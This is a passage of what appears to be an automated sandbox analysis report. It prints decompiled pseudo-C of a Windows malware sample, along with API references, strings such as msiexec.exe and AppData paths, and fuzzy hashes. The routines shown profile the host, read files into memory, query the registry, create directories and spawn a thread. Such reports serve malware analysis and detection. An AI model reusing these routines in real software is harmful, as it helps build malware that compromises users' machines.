					_t10 = E000DBF50(__eflags, 0, 0xfda8b77);
					_t11 =  *_t10(0, "C:\Windows\SysWOW64\msiexec.exe", 0x104);
					__eflags = _t11;
					_t2 = _t11 != 0;
					__eflags = _t2;
					return _t11 & 0xffffff00 | _t2;
				}
				return 0;
			}

0x000dbcd8
0x000dbce7
0x000dbcfb
0x000dbd03
0x000dbd1c
0x000dbd30
0x000dbd34
0x000dbd41
0x000dbd55
0x000dbd57
0x000dbd59
0x000dbd59
0x00000000
0x000dbd59
0x00000000

APIs

SHGetFolderPathW.SHELL32(00000000,0000801A,00000000,00000000,C:\Users\user\AppData\Roaming), ref: 000DBD30

Strings

C:\Windows\SysWOW64\msiexec.exe, xrefs: 000DBD4E
C:\Users\user\AppData\Roaming, xrefs: 000DBD24

Memory Dump Source

Source File: 00000005.00000002.2363719901.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true

Similarity

API ID: FolderPath
String ID: C:\Users\user\AppData\Roaming$C:\Windows\SysWOW64\msiexec.exe
API String ID: 1514166925-2433609249
Opcode ID: 7760b575ce8ef3dc84fbca9579e388013d3f2c19d46d29a7c8dfba90c1e50d74
Instruction ID: e49d50b07f31a5bc1f112e45e056538dede096ee74bab57d729bab4833e28773
Opcode Fuzzy Hash: 7760b575ce8ef3dc84fbca9579e388013d3f2c19d46d29a7c8dfba90c1e50d74
Instruction Fuzzy Hash: E6F0AF96B8030537F66021B52C03FBA31898BA1B69F1A0131FA0CA93C3F881A91442B3

Uniqueness

Uniqueness Score: -1.00%

Function 000E8590, Relevance: 4.6, APIs: 3, Instructions: 128
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E000E8590(void* __eflags, intOrPtr _a4) {
				void* _v20;
				long _v24;
				intOrPtr _v28;
				void* _t16;
				intOrPtr* _t18;
				void* _t19;
				union _TOKEN_INFORMATION_CLASS _t22;
				int _t23;
				signed char _t24;
				signed char _t30;
				void* _t31;
				int _t33;
				intOrPtr* _t35;
				signed char* _t36;
				void* _t40;
				intOrPtr* _t41;
				DWORD* _t42;
				signed char* _t43;
				void* _t47;
				intOrPtr _t49;
				void* _t51;
				void* _t54;
				void* _t57;
				void* _t61;
				void* _t63;

				_t63 = __eflags;
				_v20 = 0;
				_t16 = E000D9D50(0x647400a5);
				_t18 = E000DBF50(_t63, _t16, E000D9D50(0x6b5f7e12));
				_t54 = _t51 + 0x10;
				_t19 =  *_t18(_a4, 8,  &_v20);
				_t64 = _t19;
				if(_t19 == 0) {
					_t49 = 0xffffffff;
					L12:
					return _t49;
				}
				E000DBF50(_t64, 9, 0xbd557e);
				_t22 = E000D9D50(0x647400b5);
				_t42 =  &_v24;
				_t23 = GetTokenInformation(_v20, _t22, 0, 0, _t42); // executed
				_t24 = E000D55C0(_t23, 0);
				_t57 = _t54 + 0x14;
				_t49 = 0xffffffff;
				_t65 = _t24 & 0x00000001;
				if((_t24 & 0x00000001) == 0) {
					L10:
					E000DBF50(_t71, 0, 0xb8e7db5);
					CloseHandle(_v20); // executed
					goto L12;
				}
				_t30 = E000D55C0( *((intOrPtr*)(E000DBF50(_t65, 0, E000D9D50(0x68042b4e))))(), 0x7a);
				_t57 = _t57 + 0x14;
				if((_t30 & 0x00000001) == 0) {
					goto L10;
				}
				_t31 = E000D8290(_v24);
				_t57 = _t57 + 4;
				_t67 = _t31;
				if(_t31 != 0) {
					_t47 = _t31;
					E000DBF50(_t67, 9, 0xbd557e);
					_t61 = _t57 + 8;
					_t33 = GetTokenInformation(_v20, 0x19, _t47, _v24, _t42); // executed
					_t49 = 0xffffffff;
					_t68 = _t33;
					if(_t33 != 0) {
						_t35 = E000DBF50(_t68, 9, 0x8847844);
						_t61 = _t61 + 8;
						_t36 =  *_t35( *_t47);
						if(_t36 != 0) {
							_t70 =  *_t36;
							_t43 = _t36;
							if( *_t36 != 0) {
								_v28 = E000DBF50(_t70, 9, 0x7a1c189);
								_t40 = E000D22E0(_t70, ( *_t43 & 0x000000ff) + 0x57d8073d, 0x57d8073e);
								_t61 = _t61 + 0x10;
								_t41 = _v28( *_t47, _t40);
								_t71 = _t41;
								if(_t41 != 0) {
									_t49 =  *_t41;
								}
							}
						}
					}
					E000DB570(_t47);
					_t57 = _t61 + 4;
				}
			}

0x000e8590
0x000e859c
0x000e85a8
0x000e85c1
0x000e85c6
0x000e85d0
0x000e85d2
0x000e85d4
0x000e86f6
0x000e86fb
0x000e8704
0x000e8704
0x000e85e1
0x000e85f3
0x000e85fb
0x000e8605
0x000e860a
0x000e860f
0x000e8612
0x000e8617
0x000e8619
0x000e86e0
0x000e86e7
0x000e86f2
0x00000000
0x000e86f2
0x000e863c
0x000e8641
0x000e8646
0x00000000
0x00000000
0x000e864f
0x000e8654
0x000e8657
0x000e8659
0x000e865f
0x000e8668
0x000e866d
0x000e867a
0x000e867c
0x000e8681
0x000e8683
0x000e868c
0x000e8691
0x000e8696
0x000e869a
0x000e869c
0x000e869f
0x000e86a1
0x000e86b2
0x000e86c3
0x000e86c8
0x000e86ce
0x000e86d1
0x000e86d3
0x000e86d5
0x000e86d5
0x000e86d3
0x000e86a1
0x000e869a
0x000e86d8
0x000e86dd
0x000e86dd

APIs

GetTokenInformation.KERNELBASE(00000000,00000000,00000000,00000000,?), ref: 000E8605
CloseHandle.KERNEL32(00000000), ref: 000E86F2

Part of subcall function 000DBF50: LoadLibraryA.KERNEL32(?), ref: 000DC1A1

Part of subcall function 000D8290: RtlAllocateHeap.NTDLL(00000008,00000000,?,?,?,?,?,?,?,?), ref: 000D82E8

GetTokenInformation.KERNELBASE(00000000,00000019,00000000,?,?), ref: 000E867A

Memory Dump Source

Source File: 00000005.00000002.2363719901.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true

Similarity

API ID: InformationToken$AllocateCloseHandleHeapLibraryLoad
String ID:
API String ID: 3980138298-0
Opcode ID: be7c8878f23a89422498d23321ab4c7132d28cdc27a174f3599f9b84b0b169a4
Instruction ID: ca40b63884ed15a028f51ce09c71cf889a1d365e6c30daf37b8ecf025ef93db2
Opcode Fuzzy Hash: be7c8878f23a89422498d23321ab4c7132d28cdc27a174f3599f9b84b0b169a4
Instruction Fuzzy Hash: 3631B2A5E403457BEA2136B0AC03FBE36599F11759F0A0131FD1CBA3D7FA51AA1486B3

Uniqueness

Uniqueness Score: -1.00%

Function 000DA5E0, Relevance: 4.6, APIs: 3, Instructions: 100
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E000DA5E0(WCHAR* _a4, void** _a8, void* _a12) {
				void* _v12;
				char _v20;
				intOrPtr _v24;
				void* _v28;
				long _v32;
				void* _t21;
				void* _t22;
				intOrPtr* _t24;
				intOrPtr* _t26;
				void* _t28;
				void* _t30;
				int _t32;
				intOrPtr* _t33;
				void** _t42;
				signed int _t43;
				void* _t46;
				void* _t49;
				void* _t51;
				void* _t52;

				_t42 = _a8;
				E000DBF50(_t52, 0, 0xad68947);
				_t46 = (_t43 & 0xfffffff8) - 0x10 + 8;
				_t40 =  ==  ? 1 : 7;
				_t21 = CreateFileW(_a4, 0x80000000,  ==  ? 1 : 7, 0, 3, 0, 0); // executed
				_t54 = _t21 - 0xffffffff;
				_t42[2] = _t21;
				if(_t21 == 0xffffffff) {
					L4:
					_t22 = 0;
				} else {
					_t24 = E000DBF50(_t54, 0, E000D9D50(0x651fdb24));
					_t49 = _t46 + 0xc;
					_push( &_v20);
					_push(_t42[2]);
					if( *_t24() == 0) {
						L3:
						_t26 = E000DBF50(_t56, 0, 0xb8e7db5);
						 *_t26(_t42[2]);
						goto L4;
					} else {
						_t56 = _v24;
						if(_v24 == 0) {
							_t28 = _v28;
							__eflags = _t28;
							_t42[1] = _t28;
							if(__eflags == 0) {
								 *_t42 = 0;
								_t22 = 1;
							} else {
								E000DBF50(__eflags, 0, 0x1f8cae3);
								_t49 = _t49 + 8;
								_t30 = VirtualAlloc(0, _t42[1], 0x3000, 4); // executed
								__eflags = _t30;
								 *_t42 = _t30;
								if(__eflags == 0) {
									goto L3;
								} else {
									E000DBF50(__eflags, 0, 0xb7ac9a5);
									_t51 = _t49 + 8;
									_t32 = ReadFile(_t42[2],  *_t42, _t42[1],  &_v32, 0); // executed
									__eflags = _t32;
									if(__eflags == 0) {
										L12:
										_t33 = E000DBF50(__eflags, 0, 0xb1fd105);
										_t49 = _t51 + 8;
										 *_t33( *_t42, 0, 0x8000);
										goto L3;
									} else {
										__eflags = _v32 - _t42[1];
										if(__eflags != 0) {
											goto L12;
										} else {
											_t22 = 1;
										}
									}
								}
							}
						} else {
							goto L3;
						}
					}
				}
				return _t22;
			}

0x000da5eb
0x000da5f8
0x000da5fd
0x000da60e
0x000da620
0x000da622
0x000da625
0x000da628
0x000da66b
0x000da66b
0x000da62a
0x000da63a
0x000da63f
0x000da646
0x000da647
0x000da64e
0x000da657
0x000da65e
0x000da669
0x00000000
0x000da650
0x000da650
0x000da655
0x000da674
0x000da678
0x000da67a
0x000da67d
0x000da6d3
0x000da6d9
0x000da67f
0x000da686
0x000da68b
0x000da69a
0x000da69c
0x000da69e
0x000da6a0
0x00000000
0x000da6a2
0x000da6a9
0x000da6ae
0x000da6c0
0x000da6c2
0x000da6c4
0x000da6dd
0x000da6e4
0x000da6e9
0x000da6f5
0x00000000
0x000da6c6
0x000da6ca
0x000da6cd
0x00000000
0x000da6cf
0x000da6cf
0x000da6cf
0x000da6cd
0x000da6c4
0x000da6a0
0x00000000
0x00000000
0x00000000
0x000da655
0x000da64e
0x000da673

APIs

CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 000DA620
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 000DA69A
ReadFile.KERNEL32(?,?,?,?,00000000), ref: 000DA6C0

Memory Dump Source

Source File: 00000005.00000002.2363719901.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true

Similarity

API ID: File$AllocCreateReadVirtual
String ID:
API String ID: 3585551309-0
Opcode ID: 8a16c999e614f2cb2d15439e8a71d5afc7428100335bed1b89921a0e8067ef3d
Instruction ID: 0e10fff0da0687721ab9e0abfb18a61e37a2958cc7af6f14ade5649007afceee
Opcode Fuzzy Hash: 8a16c999e614f2cb2d15439e8a71d5afc7428100335bed1b89921a0e8067ef3d
Instruction Fuzzy Hash: DC31F571744301FBEB216B60DC03F9A76D0DB41B11F18482EFAAD962D1E7B1F5109A72

Uniqueness

Uniqueness Score: -1.00%

Function 000DABF0, Relevance: 4.6, APIs: 3, Instructions: 59
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E000DABF0(void* _a4, short* _a8, short* _a12, int* _a16, char* _a20, int _a24) {
				void* _t11;
				signed char _t12;
				long _t14;
				signed int _t29;
				void* _t38;

				_t12 = E000E5000(_t11, _t38, 0xffffffff);
				E000DBF50(_t38, 9, 0xda29a27);
				_t14 = RegOpenKeyExW(_a4, _a8, 0, (_t12 & 0x000000ff) << 0x00000008 | 0x00000001,  &_a4); // executed
				_t29 = 0xffffffff;
				_t39 = _t14;
				if(_t14 == 0) {
					E000DBF50(_t39, 9, 0x8097c7);
					RegQueryValueExW(_a4, _a12, 0, _a16, _a20,  &_a24); // executed
					asm("sbb esi, esi");
					_t29 =  !0x00000000 | _a24;
					E000DBF50( !0x00000000, 9, 0x3111c69);
					RegCloseKey(_a4); // executed
				}
				return _t29;
			}

0x000dabfe
0x000dac16
0x000dac27
0x000dac29
0x000dac2e
0x000dac30
0x000dac42
0x000dac56
0x000dac5d
0x000dac61
0x000dac6b
0x000dac76
0x000dac76
0x000dac7e

APIs

RegOpenKeyExW.KERNEL32(00000000,?,00000000,?,?), ref: 000DAC27
RegQueryValueExW.KERNEL32(?,?,00000000,?,?,?,?,?), ref: 000DAC56

Part of subcall function 000DBF50: LoadLibraryA.KERNEL32(?), ref: 000DC1A1

RegCloseKey.KERNEL32(?,?,?,?,?), ref: 000DAC76

Memory Dump Source

Source File: 00000005.00000002.2363719901.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true

Similarity

API ID: CloseLibraryLoadOpenQueryValue
String ID:
API String ID: 3751545530-0
Opcode ID: 0e8ffc89672215796fecbd1346c7872432632bc6830220a73860a93601033418
Instruction ID: d8317b7a5d010822de5474c9524c4bb6d209ba1ea9108223fde1c64ef4f493ea
Opcode Fuzzy Hash: 0e8ffc89672215796fecbd1346c7872432632bc6830220a73860a93601033418
Instruction Fuzzy Hash: B101D277A402287FDB109E94DC82FDB3758DB49B65F050224FE28A72C2E661BE1187F1

Uniqueness

Uniqueness Score: -1.00%

Function 000E4680, Relevance: 3.7, APIs: 2, Instructions: 710
threadCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E000E4680(void* __eflags, intOrPtr _a4, char _a8) {
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v52;
				char _v64;
				intOrPtr _v72;
				char _v76;
				char _v88;
				char _v100;
				char _v112;
				char _v124;
				char _v136;
				char _v148;
				char _v160;
				char _v172;
				char _v184;
				char _v196;
				char _v208;
				char _v220;
				char _v232;
				char _v248;
				char _v266;
				char _v306;
				char _v528;
				char _v1048;
				void* _t171;
				void* _t173;
				void* _t175;
				intOrPtr* _t177;
				void* _t178;
				intOrPtr _t179;
				signed int _t229;
				signed int _t233;
				void* _t236;
				void* _t238;
				void* _t244;
				void* _t252;
				signed int _t254;
				void* _t263;
				void* _t269;
				void* _t276;
				intOrPtr _t279;
				signed int _t287;
				void* _t288;
				void* _t290;
				void* _t293;
				signed char _t299;
				void* _t314;
				signed int _t319;
				void* _t321;
				signed int _t323;
				signed int _t325;
				WCHAR* _t327;
				signed int _t329;
				void* _t339;
				signed int _t341;
				void* _t342;
				void* _t343;
				signed int _t350;
				signed int _t353;
				intOrPtr _t368;
				intOrPtr _t404;
				signed int _t487;
				intOrPtr _t488;
				signed int _t489;
				intOrPtr _t490;
				signed int _t499;
				intOrPtr _t512;
				signed int _t513;
				void* _t530;
				void* _t531;
				void* _t535;
				void* _t593;
				void* _t604;
				void* _t606;
				void* _t609;

				_t171 = E000E7EE0(__eflags, 0xa20123ac, 1, 0xffffffff); // executed
				_t531 = _t530 + 0xc;
				_t611 = _t171;
				if(_t171 == 0) {
					L2:
					_t350 = 0;
				} else {
					_t173 = E000E9AC0(_t611, 0xffffffff); // executed
					_t473 =  ==  ? 0x8026 : 0x801a;
					_t175 = E000D9D50(0x647400a4);
					_t177 = E000DBF50(_t173 - 4, _t175, E000D9D50(0x644e562b));
					_t535 = _t531 + 0x14;
					_t351 =  &_v1048;
					_t178 =  *_t177(0,  ==  ? 0x8026 : 0x801a, 0, 0,  &_v1048); // executed
					if(_t178 == 0) {
						_t179 = E000D8290(0x3d0);
						_t510 = _t179;
						E000E1E90(__eflags, _t179 + 0xc); // executed
						_t2 = _t510 + 0x1c; // 0x1c, executed
						E000E3BC0(_t2, __eflags);
						_t3 = _t510 + 0xe6; // 0xe6
						E000D5CD0(__eflags, 2, _t3, 4, 8);
						_t4 = _t510 + 0xf8; // 0xf8
						E000DA980(_t4); // executed
						E000EF740( &_v64);
						__eflags = _a8;
						_t375 =  !=  ? 0xf0bf2 : 0xf051c;
						E000E5180( &_v1048,  &_v64, E000D7200( !=  ? 0xf0bf2 : 0xf051c,  &_v528), 0); // executed
						E000EF740( &_v232);
						E000E5180( &_v1048,  &_v232, 0, 0); // executed
						E000EF740( &_v220);
						E000E5180( &_v1048,  &_v220, 0, 0); // executed
						E000EF740( &_v208);
						E000E5180( &_v1048,  &_v208, 0, 0); // executed
						E000EF740( &_v196);
						E000E5180(_t351,  &_v196, 0, 0); // executed
						E000EF740( &_v184);
						E000E5180(_t351,  &_v184, 0, 1); // executed
						E000EF740( &_v172);
						E000E5180(_t351,  &_v172, 0, 1); // executed
						E000EF740( &_v160);
						E000E5180(_t351,  &_v160, 0, 0); // executed
						E000EF740( &_v148);
						E000E5180(_t351,  &_v148, 0, 0); // executed
						E000EF740( &_v136);
						E000E5180(_t351,  &_v136, 0, 0); // executed
						E000EF740( &_v124);
						E000E5180(_t351,  &_v124, 0, 0); // executed
						E000EF740( &_v112);
						E000E5180(_t351,  &_v112, 0, 0); // executed
						E000EF740( &_v100);
						E000E5180(_t351,  &_v100, 0, 0); // executed
						_t487 =  &_v88;
						E000EF740(_t487);
						_t470 = _t487;
						E000E5180(_t351, _t487, 0, 0); // executed
						E000D21E0(2, 0x80000001, E000D7200(0xf09d0,  &_v306),  &_v266, 4, 8); // executed
						_t404 = _t179;
						_t23 = _t404 + 0x3be; // 0x3be
						_t488 = _t404;
						_v24 = _t404;
						E000DD4F0(_t487, 0, _t23, 4, 8);
						_t25 = _t488 + 0x3c7; // 0x3c7
						E000DD4F0(_t487, 0, _t25, 4, 8);
						_t489 = E000D22E0(__eflags, E000DBA30(__eflags, _t351), 0xffffffff);
						_t229 = E000DEC30(E000EFCF0( &_v64) + _t489 * 2, 0xffffffff, _t179 + 0x1fe, 0x20);
						_t512 = _v24;
						__eflags = _t229;
						_t353 = 0 | _t229 == 0x00000000;
						_v20 = _t512 + 0x25e;
						_t233 = E000DEC30(E000EFCF0( &_v232) + _t489 * 2, 0xffffffff, _v20, 0x20);
						_t38 = _t353 + 1; // 0x1
						__eflags = _t233;
						_t513 = _t512 + 0x27e;
						_t408 =  !=  ? _t353 : _t38;
						_v20 =  !=  ? _t353 : _t38;
						_t236 = E000DEC30(E000EFCF0( &_v220) + _t489 * 2, 0xffffffff, _t513, 0x20);
						_t490 = _v24;
						__eflags = _t236 - 1;
						asm("sbb esi, esi");
						_v28 = _t490 + 0x29e;
						_t238 = E000EFCF0( &_v208);
						_v32 = _t489;
						__eflags = E000DEC30(_t238 + _t489 * 2, 0xffffffff, _v28, 0x20) - 1;
						asm("sbb esi, [ebp-0x10]");
						_v28 =  ~_t513;
						_v20 = _t490 + 0x2be;
						_t244 = E000EFCF0( &_v196);
						__eflags = E000DEC30(_t244 + _t489 * 2, 0xffffffff, _v20, E000D9D50(0x6474008c));
						_t356 = 0 | __eflags == 0x00000000;
						_v20 = E000D1460(__eflags, _t513,  ~(__eflags == 0));
						E000D1460(__eflags, _v28, _t356);
						_t252 = E000EFCF0( &_v184);
						_t254 = E000DEC30(_t252 + _v32 * 2, 0xffffffff, _v24 + 0x21e, E000D9D50(0x6474008c));
						__eflags = _t254;
						_v28 = E000D9D50(0x59d06af4);
						_v36 = _v24 + 0x23e;
						_v36 = E000DEC30(E000EFCF0( &_v172) + _v32 * 2, 0xffffffff, _v36, 0x20);
						_v40 = E000D9D50(0xe4894f31);
						_t263 = E000DEC30(E000EFCF0( &_v160) + _v32 * 2, 0xffffffff, _v24 + 0x2de, 0x20);
						__eflags = _v36 - 1;
						asm("adc ebx, 0x0");
						__eflags = _t263 - 1;
						asm("adc ebx, 0x0");
						__eflags = E000DEC30(E000EFCF0( &_v148) + _v32 * 2, 0xffffffff, _v24 + 0x2fe, 0x20);
						_t419 = 0 | __eflags == 0x00000000;
						_v20 = (_t254 == 0) - _v28 + _v20 + _v40 - 0x4358e545;
						_t269 = E000D1460(__eflags, (_t254 == 0) - _v28 + _v20 + _v40 + 0xddcba449, __eflags == 0);
						E000D1460(__eflags, _v20, _t419);
						_v20 = _v24 + 0x31e;
						__eflags = E000DEC30(E000EFCF0( &_v136) + _v32 * 2, 0xffffffff, _v20, 0x20);
						_v20 = E000D1460(E000DEC30(E000EFCF0( &_v136) + _v32 * 2, 0xffffffff, _v20, 0x20), _t269 + 0xdedb7672, 0 | E000DEC30(E000EFCF0( &_v136) + _v32 * 2, 0xffffffff, _v20, 0x20) == 0x00000000);
						_t276 = E000EFCF0( &_v124);
						__eflags = E000DEC30(_t276 + _v32 * 2, 0xffffffff, _v24 + 0x33e, E000D9D50(0x6474008c));
						_t279 = E000D1460(E000DEC30(_t276 + _v32 * 2, 0xffffffff, _v24 + 0x33e, E000D9D50(0x6474008c)), _v20, 0 | E000DEC30(_t276 + _v32 * 2, 0xffffffff, _v24 + 0x33e, E000D9D50(0x6474008c)) == 0x00000000);
						_v20 = _v24 + 0x35e;
						__eflags = E000DEC30(E000EFCF0( &_v112) + _v32 * 2, 0xffffffff, _v20, 0x20) - 1;
						asm("adc esi, 0x0");
						_v20 = _t279;
						_t287 = E000D55C0(E000DEC30(E000EFCF0( &_v100) + _v32 * 2, 0xffffffff, _v24 + 0x37e, 0x10), 0);
						_t288 = E000D9D50(0x1eac204e);
						_t290 = E000D1460(__eflags, _v20 - _t288 + (_t287 & 0x00000001), E000D9D50(0x1eac204e));
						E000D1460(__eflags, _v20, _t287 & 0x00000001);
						_t368 = _v24;
						_v20 = _t368 + 0x38e;
						_t293 = E000EFCF0( &_v88);
						__eflags = E000DEC30(_t293 + _v32 * 2, 0xffffffff, _v20, E000D9D50(0x647400bc)) - 1;
						asm("adc esi, 0x0");
						__eflags = E000DEC30( &_v266, 0xffffffff, _t368 + 0x39e, 0x20) - 1;
						asm("adc esi, 0x0");
						_t299 = E000D6BB0(E000DEC30( &_v266, 0xffffffff, _t368 + 0x39e, 0x20) - 1, _t290, 0);
						_t593 = _t535 + 0x240;
						__eflags = _t299 & 0x00000001;
						if((_t299 & 0x00000001) != 0) {
							L14:
							_t350 = 0;
							__eflags = 0;
						} else {
							_t314 = E000D9D50(0x647410ac);
							_t499 = E000DD620(_t314, E000D9D50(0x6474ff53));
							_t319 = E000D20A0(__eflags, _t499,  !(E000D9D50(0x6474ff53)));
							E000D9D50(0x6474ff53);
							_t321 = E000D9D50(0x647410ac);
							_t323 = E000DD620(_t321, E000D9D50(0x6474ff53));
							 *(_t368 + 0x1fa) = _t323 << E000D9D50(0x647400bc) | _t319 & _t499;
							_t325 = E000DD030(_t324, __eflags, _t368); // executed
							_t604 = _t593 + 0x38;
							__eflags = _t325;
							if(_t325 == 0) {
								goto L14;
							} else {
								_t529 = _a4;
								E000EEDD0( &_v52);
								_t327 = E000EFCF0(_a4);
								_t329 = E000DA5E0(_t327,  &_v76, E000D9D50(0x647400ae)); // executed
								_t606 = _t604 + 0x10;
								__eflags = _t329;
								if(_t329 != 0) {
									_t470 = _v72 + _v76;
									__eflags = _v72 + _v76;
									E000EF410(_v76,  &_v52, _v76, _v72 + _v76); // executed
									E000E9C40(__eflags,  &_v76); // executed
									_t606 = _t606 + 4;
								}
								_t447 =  &_v52;
								__eflags = E000EF190( &_v52);
								if(__eflags != 0) {
									_t339 = E000EF190( &_v52);
									_t341 = E000ECB00(__eflags,  &_v248, E000EEE10( &_v52), _t339); // executed
									_t609 = _t606 + 0xc;
									__eflags = _t341;
									if(__eflags != 0) {
										E000DECC0(_t341,  &_v248, _t470, __eflags); // executed
									}
									_t342 = E000EF190( &_v52);
									_t343 = E000EEE10( &_v52);
									_t447 =  &_v64;
									E000E9600(E000EFCF0( &_v64), __eflags, _t344, _t343, _t342); // executed
									_t606 = _t609 + 0xc; // executed
								}
								E000E04C0(_t447, _t470, __eflags); // executed
								E000E5040(_t447, _t470, __eflags); // executed
								__eflags = E000E6700(__eflags);
								if(__eflags != 0) {
									E000DBF50(__eflags, 0, 0xa0733d4);
									CreateThread(0, 0, E000E5420, E000E7640(E000EFCF0(_t529), 0xffffffff), 0, 0); // executed
								}
								E000EFB40( &_v52); // executed
								_t350 = 1;
							}
						}
						E000EFB20( &_v88);
						E000EFB20( &_v100);
						E000EFB20( &_v112);
						E000EFB20( &_v124);
						E000EFB20( &_v136);
						E000EFB20( &_v148);
						E000EFB20( &_v160);
						E000EFB20( &_v172);
						E000EFB20( &_v184);
						E000EFB20( &_v196);
						E000EFB20( &_v208);
						E000EFB20( &_v220);
						E000EFB20( &_v232);
						E000EFB20( &_v64);
					} else {
						goto L2;
					}
				}
				return _t350;
			}

0x000e4695
0x000e469a
0x000e469d
0x000e469f
0x000e46f4
0x000e46f4
0x000e46a1
0x000e46a3
0x000e46b7
0x000e46bf
0x000e46d8
0x000e46dd
0x000e46e0
0x000e46ee
0x000e46f2
0x000e4700
0x000e4708
0x000e470e
0x000e4716
0x000e4719
0x000e471e
0x000e472b
0x000e4733
0x000e473a
0x000e4747
0x000e474c
0x000e475a
0x000e4774
0x000e4784
0x000e4791
0x000e47a1
0x000e47ae
0x000e47be
0x000e47cb
0x000e47db
0x000e47e8
0x000e47f8
0x000e4805
0x000e4815
0x000e4822
0x000e4832
0x000e483f
0x000e484f
0x000e485c
0x000e486c
0x000e4879
0x000e4886
0x000e4893
0x000e48a0
0x000e48ad
0x000e48ba
0x000e48c7
0x000e48cf
0x000e48d4
0x000e48db
0x000e48e1
0x000e4910
0x000e4918
0x000e4920
0x000e4926
0x000e4928
0x000e4932
0x000e493a
0x000e4947
0x000e4966
0x000e4976
0x000e497e
0x000e4983
0x000e498b
0x000e4994
0x000e49a7
0x000e49af
0x000e49b2
0x000e49b4
0x000e49ba
0x000e49bd
0x000e49d6
0x000e49de
0x000e49e1
0x000e49ea
0x000e49f2
0x000e49f5
0x000e49fd
0x000e4a10
0x000e4a19
0x000e4a20
0x000e4a29
0x000e4a2c
0x000e4a52
0x000e4a54
0x000e4a65
0x000e4a6c
0x000e4a83
0x000e4aa0
0x000e4aaa
0x000e4abf
0x000e4ace
0x000e4ae9
0x000e4aff
0x000e4b19
0x000e4b32
0x000e4b36
0x000e4b39
0x000e4b3f
0x000e4b60
0x000e4b68
0x000e4b71
0x000e4b78
0x000e4b8c
0x000e4ba3
0x000e4bc3
0x000e4bd5
0x000e4bde
0x000e4c02
0x000e4c0b
0x000e4c21
0x000e4c3c
0x000e4c42
0x000e4c45
0x000e4c67
0x000e4c79
0x000e4c99
0x000e4ca5
0x000e4cad
0x000e4cb9
0x000e4cbc
0x000e4ce3
0x000e4cec
0x000e4d03
0x000e4d06
0x000e4d0c
0x000e4d11
0x000e4d14
0x000e4d16
0x000e4ec7
0x000e4ec7
0x000e4ec7
0x000e4d1c
0x000e4d21
0x000e4d42
0x000e4d55
0x000e4d66
0x000e4d73
0x000e4d8c
0x000e4da9
0x000e4db0
0x000e4db5
0x000e4db8
0x000e4dba
0x00000000
0x000e4dc0
0x000e4dc0
0x000e4dc6
0x000e4dcd
0x000e4de7
0x000e4dec
0x000e4def
0x000e4df1
0x000e4dfc
0x000e4dfc
0x000e4e00
0x000e4e06
0x000e4e0b
0x000e4e0b
0x000e4e0e
0x000e4e16
0x000e4e18
0x000e4e1f
0x000e4e36
0x000e4e3b
0x000e4e3e
0x000e4e40
0x000e4e48
0x000e4e48
0x000e4e52
0x000e4e5b
0x000e4e60
0x000e4e6d
0x000e4e72
0x000e4e72
0x000e4e75
0x000e4e7a
0x000e4e84
0x000e4e86
0x000e4e8f
0x000e4eb9
0x000e4eb9
0x000e4ebe
0x000e4ec3
0x000e4ec3
0x000e4dba
0x000e4ecc
0x000e4ed4
0x000e4edc
0x000e4ee4
0x000e4eef
0x000e4efa
0x000e4f05
0x000e4f10
0x000e4f1b
0x000e4f26
0x000e4f31
0x000e4f3c
0x000e4f47
0x000e4f4f
0x00000000
0x00000000
0x00000000
0x000e46f2
0x000e4f60

APIs

SHGetFolderPathW.SHELL32(00000000,0000801A,00000000,00000000,?), ref: 000E46EE

Part of subcall function 000E5180: CreateDirectoryW.KERNEL32(?,00000000), ref: 000E51F0

Part of subcall function 000D21E0: RegCreateKeyExW.KERNEL32(?,?,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 000D2210

Part of subcall function 000DA5E0: CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 000DA620

CreateThread.KERNEL32(00000000,00000000,Function_00015420,00000000,00000000,00000000), ref: 000E4EB9

Part of subcall function 000E9C40: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?), ref: 000E9C6F
Part of subcall function 000E9C40: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 000E9C89

Memory Dump Source

Source File: 00000005.00000002.2363719901.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true

Similarity

API ID: Create$CloseDirectoryFileFolderFreeHandlePathThreadVirtual
String ID:
API String ID: 1450970588-0
Opcode ID: 3226436c37470d4edc31dc6c03184763a27332d9fe39f9c3e15896ac66860f59
Instruction ID: c405f27aa02081f44492b7687bedc5d66cd8bd68966cf15a5b4fd4fd763c86b0
Opcode Fuzzy Hash: 3226436c37470d4edc31dc6c03184763a27332d9fe39f9c3e15896ac66860f59
Instruction Fuzzy Hash: 6F32D672E002596FDB10BBA1DC53FFE726AAB90304F540575F919BB3C3EE706A0586A1

Uniqueness

Uniqueness Score: -1.00%

Function 000E3BC0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E000E3BC0(intOrPtr __ecx, void* __eflags) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v52;
				char _v86;
				char _v122;
				char _v158;
				char _v196;
				char _v256;
				short _v456;
				char _v574;
				char _v774;
				int _t23;
				void* _t25;
				intOrPtr* _t27;
				void* _t28;
				void* _t30;
				char _t33;
				intOrPtr _t36;
				void* _t38;
				void* _t40;
				signed char _t43;
				char* _t53;
				DWORD* _t59;
				void* _t61;
				void* _t62;
				void* _t66;

				_v24 = __ecx;
				_v20 = 0x64;
				E000DBF50(__eflags, 0, 0x6f6e3c7);
				_t62 = _t61 + 8;
				_t59 =  &_v20;
				_t23 = GetComputerNameW( &_v456, _t59); // executed
				_t81 = _t23;
				if(_t23 == 0) {
					E000E7700( &_v456, E000D7200(0xf075e,  &_v122), 0xffffffff);
					_t62 = _t62 + 0x14;
				}
